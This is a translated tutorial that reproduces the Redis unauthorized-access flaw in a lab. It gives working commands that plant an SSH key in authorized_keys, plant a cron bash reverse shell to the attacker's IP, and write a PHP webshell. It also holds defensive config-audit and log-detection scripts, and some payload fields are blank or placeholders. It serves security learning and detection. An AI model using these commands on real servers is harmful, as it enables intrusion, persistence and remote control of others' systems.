2025-01-19 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com) 05/31 Report--
This article shares an example analysis of reproducing a Redis vulnerability. The editor finds it very practical, so it is shared here for reference; follow along with the editor and have a look.
1. A brief introduction to the vulnerability: what is Redis?
Redis is a high-performance key-value database. Like Memcached, it keeps data in memory for speed, but it supports more value types: string, list (linked list), set, zset (sorted set) and hash. These types support push/pop, add/remove, intersection, union and difference, and richer operations, all of which are atomic. On top of this, Redis supports a variety of sorting methods. Unlike Memcached, Redis periodically writes updated data to disk, or appends modification operations to a log file, and builds master-slave synchronization on that basis. Redis makes up for many of the shortcomings of key/value stores such as Memcached and can complement a relational database well in some scenarios. Clients are provided for Java, C/C++, C#, PHP, JavaScript, Perl, Objective-C, Python, Ruby and Erlang, so it is easy to use.
Redis unauthorized access vulnerability
By default, Redis binds to 0.0.0.0:6379. If no countermeasures are taken, such as firewall rules that block access from untrusted source IPs, the Redis service is exposed to the public network. If no password is configured (the default is empty), any user who can reach the target server can access Redis without authorization and read its data. With unauthorized access, an attacker can also use Redis's own CONFIG command to write files to disk.
The vulnerability is exploitable when both of the following hold:
(1) Redis is bound to 0.0.0.0:6379 and no firewall rule or other security policy blocks untrusted source IPs, so the service is directly exposed on the public network;
(2) no password authentication is configured (the default is empty), so the Redis service can be logged into remotely without a password.
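As an added check (example code, not from the original article or the Redis project), the following script audits a redis.conf for the two conditions above plus the CONFIG command that the file-write technique depends on. The directives used (bind, requirepass, protected-mode, rename-command) are real Redis settings; the sample configurations are constructed.

```python
"""Audit a redis.conf against the two exposure conditions above (bound to
all interfaces, no password) and the CONFIG command the write-file
technique relies on. Constructed example; not Redis project code."""

def parse_redis_conf(text):
    """Return {directive: [values...]} for non-comment, non-empty lines."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        val = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(val)
    return conf

def audit_redis_conf(text):
    """Return (severity, message) findings; an empty list means hardened."""
    conf = parse_redis_conf(text)
    findings = []
    # No 'bind' line at all means every interface, as in the default used here.
    binds = conf.get("bind", [""])[-1].split()
    if not binds or "0.0.0.0" in binds or "::" in binds:
        findings.append(("high", "listens on all interfaces (no or any bind)"))
    password = conf.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append(("high", "requirepass not set: no authentication"))
    elif len(password) < 16:
        findings.append(("medium", "requirepass is short"))
    # protected-mode exists from Redis 3.2 on; it is absent on the 2.8.17 used above.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append(("medium", "protected-mode is disabled"))
    renamed = any(v.split()[0].upper() == "CONFIG"
                  for v in conf.get("rename-command", []) if v.split())
    if not renamed:
        findings.append(("medium", "CONFIG command not renamed or disabled"))
    return findings

# Constructed samples: the exposed default from the walkthrough, then a hardened one.
WEAK_CONF = "port 6379\nbind 0.0.0.0\n# requirepass foobared\ndir /var/lib/redis\n"
HARDENED_CONF = ("port 6379\nbind 127.0.0.1\nprotected-mode yes\n"
                 "requirepass Ch4ngeMe-long-random-passphrase\n"
                 'rename-command CONFIG ""\ndir /var/lib/redis\n')

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf))
```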
This reproduction covers three scenarios:
1. Redis runs as root: write an SSH public key into the root account's authorized_keys and log in to the victim server directly over SSH.
2. Write a file into a periodic scheduled task (cron) directory, then catch the reverse shell.
3. If a web server is present, write a webshell and control the server (because this is a self-built test environment, the file is only written to the /tmp directory; in a real situation the path must be changed).
Prepare the environment:
Attacker (Kali): 192.168.163.131 (you need to build redis-cli yourself; the steps are the same as for the server build)
Target (CentOS): 192.168.163.132
2. Build the environment
(1) Download the Redis package:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
(2) Put the archive into the chosen path and change into it:
cp redis-2.8.17.tar.gz /root/Desktop/redis/redis-2.8.17.tar.gz
cd /root/Desktop/redis
(3) Unpack the archive, enter redis-2.8.17, and build:
tar xzf redis-2.8.17.tar.gz
cd redis-2.8.17
make
(4) Go to the src directory:
cd src
(5) Copy redis-server and redis-cli to /usr/bin, and copy redis.conf from the redis-2.8.17 directory to /etc:
cp redis-server /usr/bin
cp redis-cli /usr/bin
cp ../redis.conf /etc/redis.conf
(6) Start the service:
redis-server /etc/redis.conf
3. Vulnerability reproduction
3.1 Using public/private key authentication to obtain root privileges
(1) Try the unauthorized connection (it cannot connect yet):
redis-cli -h 192.168.163.132
(2) Because the server was built locally, port 6379 is not open externally. For convenience, stop the firewall on the server (target) directly:
/etc/init.d/iptables stop
(3) From the Kali attacker, connect without authorization and list the keys:
redis-cli -h 192.168.163.132
keys *
(4) Generate an SSH key pair on the attacker machine, with an empty passphrase:
ssh-keygen -t rsa
(5) Enter the .ssh directory and save the generated public key, padded with blank lines, to 1.txt:
cd /root/.ssh
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt
(6) Write the public key saved in 1.txt into Redis (connect to the target with redis-cli -h <ip> and pipe the file in as the value):
cat 1.txt | redis-cli -h 192.168.163.132 -x set crack
(7) Use the CONFIG GET dir command to find the Redis dump directory:
CONFIG GET dir
(8) Change the Redis dump directory to the SSH public key directory (by default /root/.ssh), and set the dump file name to authorized_keys:
CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys
(9) Check that the change took effect (the dbfilename should now be authorized_keys), then save; the SSH public key is now written to the target:
CONFIG GET dbfilename
save
(10) Check on the server that the file was written successfully.
(11) The attacker logs in to the server successfully:
ssh -i id_rsa root@192.168.163.132
3.2 Using crontab to get a reverse shell
With sufficient permissions, use Redis to write a file into the periodic scheduled task directory so that it is executed.
(1) Listen on a chosen port on the Kali attacker:
nc -lvnp 8888
(2) Write the file to the server (the cron schedule fields are garbled in the source and are left as a placeholder):
set xxx "\n\n<cron schedule fields> /bin/bash -i >& /dev/tcp/192.168.163.131/8888 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
(3) Check the write on the server side.
(4) The Kali attacker receives the connection (the reverse shell is obtained).
3.3 Writing a webshell
Because this is a self-built test environment, the file is only written to the /tmp directory; in a real situation the directory must be changed to the web path.
(1) Write the file to the /tmp directory:
config set dir /tmp
config set dbfilename shell.php
set webshell ""
save
(2) View the file on the server.
Note: when writing a webshell, you can use:
set x "\r\n\n"
Here \r\n\r\n represents a line break. Files written by Redis carry some version information before the value, so if the value is not separated by line breaks it may not be executed.
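All three scenarios in 3.1 to 3.3 share the same server-side footprint: CONFIG SET dir and CONFIG SET dbfilename pointing at a sensitive location, followed by SAVE. As an added detection example (not from the original article or the Redis project), the following script flags that sequence per client in Redis MONITOR-style output; the MONITOR excerpt is constructed, and the sensitive directory and file name lists are assumptions drawn from the paths used above.

```python
"""Flag the CONFIG SET dir / dbfilename / SAVE sequence used in 3.1-3.3
in Redis MONITOR-style output. Constructed example; not Redis project code."""
import re
from collections import defaultdict

# MONITOR line shape: <unix ts> [<db> <client addr>] "<cmd>" "<arg>" ...
LINE_RE = re.compile(r'^(\S+) \[(\d+) ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Assumed lists: directories and file names from the walkthrough that a dump should never land in.
SENSITIVE_DIRS = ("/root/.ssh", "/home/", "/var/spool/cron", "/etc/cron", "/var/www", "/tmp")
SENSITIVE_NAMES = re.compile(r"authorized_keys|\.php$|^root$|crontab", re.I)

def parse_monitor_line(line):
    """Return (timestamp, client, [args]) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), m.group(3), ARG_RE.findall(m.group(4))

def detect_file_write_abuse(lines):
    """One alert per SAVE/BGSAVE whose dump would land in a sensitive dir or file name."""
    state = defaultdict(dict)  # client addr -> last seen dir / dbfilename
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, client, args = parsed
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            if args[2].lower() in ("dir", "dbfilename"):
                state[client][args[2].lower()] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            d = state[client].get("dir", "")
            f = state[client].get("dbfilename", "")
            if d.startswith(SENSITIVE_DIRS) or SENSITIVE_NAMES.search(f):
                alerts.append(f"{ts} {client}: dump written to {d or '?'}/{f or 'dump.rdb'}")
    return alerts

# Constructed MONITOR excerpt: the 3.1 sequence from the attacker IP, then a benign client.
SAMPLE_MONITOR = """\
1700000001.100000 [0 192.168.163.131:50322] "keys" "*"
1700000002.200000 [0 192.168.163.131:50322] "set" "crack" "\\n\\nssh-rsa AAAA...\\n\\n"
1700000004.400000 [0 192.168.163.131:50322] "config" "set" "dir" "/root/.ssh"
1700000005.500000 [0 192.168.163.131:50322] "config" "set" "dbfilename" "authorized_keys"
1700000006.600000 [0 192.168.163.131:50322] "save"
1700000007.700000 [0 10.0.0.5:41000] "set" "session:42" "ok"
1700000008.800000 [0 10.0.0.5:41000] "bgsave"
"""
```

Run it against a captured MONITOR stream with `detect_file_write_abuse(open(path).read().splitlines())`; the benign client's BGSAVE into the normal dump directory produces no alert.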
Thank you for reading! This is the end of the article "Example Analysis of Redis Vulnerability Reproduction". I hope the content above is of some help to you and lets you learn something new. If you think the article is good, share it so more people can see it!